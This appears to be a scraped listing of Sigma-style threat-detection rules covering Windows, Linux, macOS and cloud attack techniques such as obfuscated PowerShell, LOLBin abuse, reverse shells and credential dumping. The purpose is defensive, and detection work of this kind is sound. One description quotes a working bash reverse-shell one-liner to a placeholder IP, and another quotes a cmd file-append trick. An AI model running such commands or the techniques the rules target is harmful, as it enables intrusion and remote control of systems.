DMP/HDMP File CreationlowDetects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
Non-DLL Extension File Renamed With DLL ExtensionmediumDetects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
Amsi.DLL Load By Uncommon ProcesslowDetects loading of Amsi.dll by uncommon processes
Dllhost.EXE Initiated Network Connection To Non-Local IP AddressmediumDetects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
HH.EXE Initiated HTTP Network ConnectionmediumDetects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
Msiexec.EXE Initiated Network Connection Over HTTPlowDetects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.
Windows Mail App Mailbox Access Via PowerShell ScriptmediumDetects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlocklowDetects when a powershell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
Use Of Remove-Item to Delete File - ScriptBlocklowPowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse"
Potential Shellcode InjectionmediumDetects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
Set Files as System Files Using Attrib.EXElowDetects the execution of "attrib" with the "+s" flag to mark files as system files
Potential BOINC Software Execution (UC-Berkeley Signature)informationalDetects the use of software that is related to the University of California, Berkeley via metadata information. This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
Potential File Override/Append Via SET CommandlowDetects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". The typical use case of the "set /p=" command is to prompt the user for input.
Headless Process Launched Via Conhost.EXEmediumDetects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the windows from the user upon execution.
Dynamic .NET Compilation Via Csc.EXE - HuntingmediumDetects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
Diskshadow Child Process SpawnedmediumDetects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
ClickOnce Deployment Execution - Dfsvc.EXE Child ProcessmediumDetects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
Diskshadow Script Mode ExecutionmediumDetects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
Potential Proxy Execution Via Explorer.EXE From Shell ProcesslowDetects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. While this is often a legitimate action, this rule can be use to hunt for anomalies. Muddy Waters threat actor was seeing using this technique.
Potential DLL Sideloading Activity Via ExtExport.EXEmediumDetects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags was provided.
New Self Extracting Package Created Via IExpress.EXEmediumDetects the "iexpress.exe" utility creating self-extracting packages. Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
Microsoft Workflow Compiler ExecutionmediumDetects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
CodePage Modification Via MODE.COMlowDetects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware.
Suspicious New Instance Of An Office COM ObjectmediumDetects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
Invocation Of Crypto-Classes From The "Cryptography" PowerShell NamespacemediumDetects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
Regsvr32.EXE Calling of DllRegisterServer Export Function ImplicitlymediumDetects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
DLL Call by Ordinal Via Rundll32.EXEmediumDetects calls of DLLs exports by ordinal numbers via rundll32.dll.
Rundll32.EXE Calling DllRegisterServer Export Function ExplicitlymediumDetects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
Potential CommandLine Obfuscation Using Unicode CharactersmediumDetects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Elevated System Shell SpawnedmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
Potential Suspicious Execution From GUID Like Folder NameslowDetects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
File or Folder Permissions ModificationsmediumDetects a file or folder's permissions being modified or tampered with.
Arbitrary Command Execution Using WSLmediumDetects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
Microsoft Office Trusted Location UpdatedmediumDetects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
Registry Set With Crypto-Classes From The "Cryptography" PowerShell NamespacemediumDetects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
Service Binary in User Controlled FoldermediumDetects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
AWS Macie EvasionmediumDetects evade to Macie detection.
Use of Debugfs to Access a Raw DiskmediumDetects access to a raw disk on a host to evade detection by security products.
Invoke-Obfuscation CLIP+ LauncherhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX InvocationhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block)
Invoke-Obfuscation STDIN+ LauncherhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ LauncherhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATIONmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHERmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via StdinhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use CliphighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTAhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32highDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATIONhighDetects Obfuscated Powershell via VAR++ LAUNCHER
File Creation by Office ApplicationshighThis rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
Execution via CL_Invocation.ps1 (2 Lines)highDetects Execution via SyncInvoke in CL_Invocation.ps1 module
Execution via CL_Mutexverifiers.ps1 (2 Lines)highDetects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Files Dropped to Program Files by Non-Priviledged ProcessmediumSearch for dropping of files to Windows/Program Files fodlers by non-priviledged processes
attack.execution 821
Show Rules (821)
Title Level Description
OMIGOD SCX RunAsProvider ExecuteShellCommand - AuditdhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
iOS Implant URL PatterncriticalDetects URL pattern used by iOS Implant
Credential Dumping Tools Service ExecutioncriticalDetects well-known credential dumping tools execution via service execution events
PowerShell Scripts Run by a ServiceshighDetects powershell script installed as a Service
Alternate PowerShell Hosts - ImagelowDetects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
Suspicious CLR Logs CreationhighDetects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.
Windows Management Instrumentation DLL Loaded Via Microsoft WordinformationalDetects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands
PsExec Pipes ArtifactsmediumDetecting use PsExec via Pipe Creation/Access to pipes
Dnscat ExecutioncriticalDnscat exfiltration tool execution
Suspicious PowerShell DownloadmediumDetects suspicious PowerShell download command
Suspicious PowerShell Invocations - GenerichighDetects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - SpecifichighDetects suspicious PowerShell invocation command parameters
APT29highThis method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
Lazarus Activity Apr21highDetects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
Lazarus LoaderscriticalDetects different loaders as described in various threat reports on Lazarus group activity
TA505 Dropper Load PatterncriticalDetects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
Read and Execute a File Via Cmd.exemediumDetect use of "/R <" to read and execute a file via cmd.exe
Visual Basic Script ExecutionmediumAdversaries may abuse Visual Basic (VB) for execution
Execution via MSSQL Xp_cmdshell Stored ProcedurehighDetects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.
Invoke-Obfuscation RUNDLL LAUNCHERmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Use Rundll32highDetects Obfuscated Powershell via use Rundll32 in Scripts
New Lolbin Process by Office ApplicationshighThis rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
Monitoring Wuauclt.exe For Lolbas Execution Of DLLmediumAdversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
Ryuk Ransomware Command Line ActivitycriticalDetects Ryuk Ransomware command lines
Excel Proxy Executing Regsvr32 With PayloadhighExcel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
Excel Proxy Executing Regsvr32 With Payload AlternatehighExcel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
Office Applications Spawning Wmi Cli AlternatehighInitial execution of malicious document calls wmic to execute the file with regsvr32
PowerShell AMSI Bypass PatternhighDetects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
Base64 Encoded Listing of ShadowcopyhighDetects base64 encoded listing Win32_Shadowcopy
Malicious Base64 Encoded Powershell Invoke CmdletshighDetects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
Potential Xor Encoded PowerShell CommandmediumDetects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection
Renamed PaExec ExecutionmediumDetects execution of renamed paexec via imphash and executable product string
Suspicious Add Scheduled Task From User AppData Temphighschtasks.exe create task from user AppData\Local\Temp
Suspicious Execution of Sc to Delete AV ServiceshighDetects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
Suspicious Cmd Execution via WMImediumDetects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.
Wscript Execution from Non C DrivemediumDetects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.
Process Start From Suspicious FolderlowDetects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files
Squirrel LolbinmediumDetects Possible Squirrel Packages Manager as Lolbin
PsExec Tool ExecutionlowDetects PsExec service execution via default service image name
PsExec Service StartlowDetects a PsExec service start
WMI Execution Via Office ProcessmediumInitial execution of malicious document calls wmic to execute the file with regsvr32
WMI Remote Command ExecutionmediumAn adversary might use WMI to execute commands on a remote system
WMI Reconnaissance List Remote ServicesmediumAn adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
Adwind RAT / JRAT - RegistryhighDetects javaw.exe in AppData folder as used by Adwind / JRAT
PowerShell ExecutionmediumDetects execution of PowerShell
Lateral Movement Indicator ConDrvlowThis event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.
Suspicious Esentutl UsehighDetects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
Kubernetes CronJob/Job ModificationmediumDetects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.
Antivirus Exploitation Framework DetectioncriticalDetects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Hacktool DetectionhighDetects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
AWS EC2 Startup Shell Script ChangehighDetects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
AWS IAM S3Browser Templated S3 Bucket Policy CreationhighDetects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
AWS IAM S3Browser LoginProfile CreationhighDetects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
AWS IAM S3Browser User or AccessKey CreationhighDetects S3 Browser utility creating IAM User or AccessKey.
Azure Kubernetes CronJobmediumIdentifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Azure New CloudShell CreatedmediumIdentifies when a new cloudshell is created inside of Azure portal.
Google Cloud Kubernetes CronJobmediumIdentifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
BPFDoor Abnormal Process ID or Lock File Accessedhighdetects BPFDoor .lock and .pid files access in temporary file storage facility
Suspicious Commands LinuxmediumDetects relevant commands often related to malware or hacking activity
Equation Group IndicatorshighDetects suspicious shell commands used in various Equation Group scripts and tools
Suspicious Activity in Shell CommandshighDetects suspicious shell commands used in various exploit codes (see references)
Suspicious Reverse Shell Command LinehighDetects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
Space After FilenamelowDetects space after filename
JexBoss Command SequencehighDetects suspicious command sequence that JexBoss
Symlink Etc PasswdhighDetects suspicious command lines that look as if they would create symbolic links to /etc/passwd
Linux Reverse Shell IndicatorcriticalDetects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Suspicious Invocation of Shell via AWK - LinuxhighDetects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
Bash Interactive ShelllowDetects execution of the bash shell with the interactive flag "-i".
BPFtrace Unsafe Option UsagemediumDetects the usage of the unsafe bpftrace option
Enable BPF Kprobes TracingmediumDetects common command used to enable bpf kprobes tracing
Capsh Shell Invocation - LinuxhighDetects the use of the "capsh" utility to invoke a shell.
Atlassian Confluence CVE-2022-26134highDetects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Shell Invocation via Env Command - LinuxhighDetects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
ESXi Admin Permission Assigned To Account Via ESXCLIhighDetects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
ESXi VM Kill Via ESXCLImediumDetects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
Shell Execution via Git - LinuxhighDetects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Named Pipe Created Via MkfifolowDetects the creation of a new named pipe using the "mkfifo" utility
Potentially Suspicious Named Pipe Created Via MkfifomediumDetects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
Potential Netcat Reverse Shell ExecutionhighDetects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Nohup ExecutionmediumDetects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Suspicious Nohup ExecutionhighDetects execution of binaries located in potentially suspicious locations via "nohup"
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommandhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Potential Perl Reverse Shell ExecutionhighDetects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Potential PHP Reverse ShellhighDetects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
Python Spawning Pretty TTY Via PTY ModulemediumDetects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
Python Reverse Shell Execution Via PTY And Socket ModuleshighDetects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
Inline Python Execution - Spawn Shell Via OS System LibraryhighDetects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
Shell Execution via Rsync - LinuxhighDetects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Suspicious Invocation of Shell via RsynchighDetects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
Potential Ruby Reverse ShellmediumDetects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
Scheduled Cron Task/Job - LinuxmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Shell Invocation Via Ssh - LinuxhighDetects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Linux HackTool ExecutionhighDetects known hacktool execution based on image name.
Interactive Bash Suspicious ChildrenmediumDetects suspicious interactive bash as a parent to rather uncommon child processes
Suspicious Java Children ProcesseshighDetects java process spawning suspicious children
Execution Of Script Located In Potentially Suspicious DirectorymediumDetects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
Shell Execution Of Process Located In Tmp DirectoryhighDetects execution of shells from a parent process located in a temporary (/tmp) directory
Potential Xterm Reverse ShellmediumDetects usage of "xterm" as a potential reverse shell tunnel
MacOS Scripting Interpreter AppleScriptmediumDetects execution of AppleScript of the macOS scripting language AppleScript.
Clipboard Data Collection Via OSAScripthighDetects possible collection of data from the clipboard via execution of the osascript binary
Suspicious Installer Package Child ProcessmediumDetects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
JAMF MDM Potential Suspicious Child ProcessmediumDetects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.
JAMF MDM ExecutionlowDetects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
JXA In-memory Execution Via OSAScripthighDetects possible malicious execution of JXA in-memory via OSAScript
Launch Agent/Daemon Execution Via LaunchctlmediumDetects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
Suspicious Microsoft Office Child Process - MacOShighDetects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
OSACompile Run-Only ExecutionhighDetects potential suspicious run-only executions compiled using OSACompile
Payload Decoded and Decrypted via Built-in UtilitiesmediumDetects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
Scheduled Cron Task/Job - MacOsmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Osacompile Execution By Potentially Suspicious Applet/OsascriptmediumDetects potential suspicious applet or osascript executing "osacompile".
Suspicious Browser Child Process - MacOSmediumDetects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
Suspicious Execution via macOS Script EditormediumDetects when the macOS Script Editor utility spawns an unusual child process.
Potential In-Memory Download And Compile Of PayloadsmediumDetects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
MITRE BZAR Indicators for ExecutionmediumWindows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
Possible PrintNightmare Print Driver InstallmediumDetects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
DNS Events Related To Mining PoolslowIdentifies clients that may be performing DNS lookups associated with common currency mining pools.
OMIGOD HTTP No Authentication RCEhighDetects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Download From Suspicious TLD - BlacklistlowDetects download of certain file types from hosts in suspicious TLDs
Download From Suspicious TLD - WhitelistlowDetects executable downloads from suspicious remote systems
Flash Player Update from Suspicious LocationhighDetects a flashplayer update from an unofficial location
F5 BIG-IP iControl Rest API Command Execution - WebservermediumDetects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
Dump Ntds.dit To Suspicious LocationmediumDetects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
MSI Installation From Suspicious LocationsmediumDetects MSI package installation from suspicious locations
MSSQL XPCmdshell Suspicious ExecutionhighDetects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
MSSQL XPCmdshell Option ChangehighDetects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
Remote Access Tool - ScreenConnect Command ExecutionlowDetects command execution via ScreenConnect RMM
Remote Access Tool - ScreenConnect File TransferlowDetects file being transferred via ScreenConnect RMM
File Was Not Allowed To RunmediumDetect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
Sysinternals Tools AppX Versions ExecutionlowDetects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths
Suspicious Digital Signature Of AppX PackagemediumDetects execution of AppX packages with known suspicious or malicious signature
CodeIntegrity - Unmet Signing Level Requirements By File Under ValidationlowDetects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation.
Loading Diagcab Package From Remote PathhighDetects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability
Hacktool RulerhighThis events that are generated when using the hacktool Ruler by Sensepost
CobaltStrike Service Installations - SecurityhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
Invoke-Obfuscation CLIP+ Launcher - SecurityhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation STDIN+ Launcher - SecurityhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - SecurityhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - SecuritymediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - SecuritymediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - SecurityhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use Clip - SecurityhighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTA - SecurityhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32 - SecurityhighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - SecurityhighDetects Obfuscated Powershell via VAR++ LAUNCHER
Credential Dumping Tools Service Execution - SecurityhighDetects well-known credential dumping tools execution via service execution events
Metasploit Or Impacket Service Installation Via SMB PsExechighDetects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
PowerShell Scripts Installed as Services - SecurityhighDetects powershell script installed as a Service
Remote PowerShell Sessions Network Connections (WinRM)highDetects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
Suspicious Scheduled Task CreationhighDetects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
Important Scheduled Task Deleted/DisabledhighDetects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
Suspicious Scheduled Task UpdatehighDetects update to a scheduled task event that contain suspicious keywords.
T1047 Wmiprvse Wbemcomn DLL HijackhighDetects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
Successful Account Login Via WMIlowDetects successful logon attempts performed with WMI
Suspicious Application InstalledmediumDetects suspicious application installed by looking at the added shortcut to the app resolver cache
Local Privilege Escalation Indicator TabTiphighDetects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
Suspicious Usage of CVE_2021_34484 or CVE 2022_21919lowDuring exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \Users\TEMP is created may be created during the exploitation. Viewed on 2008 Server
CobaltStrike Service Installations - SystemcriticalDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
smbexec.py Service InstallationhighDetects the use of smbexec.py tool by detecting a specific service installation
Invoke-Obfuscation CLIP+ Launcher - SystemhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation STDIN+ Launcher - SystemhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - SystemhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - SystemmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
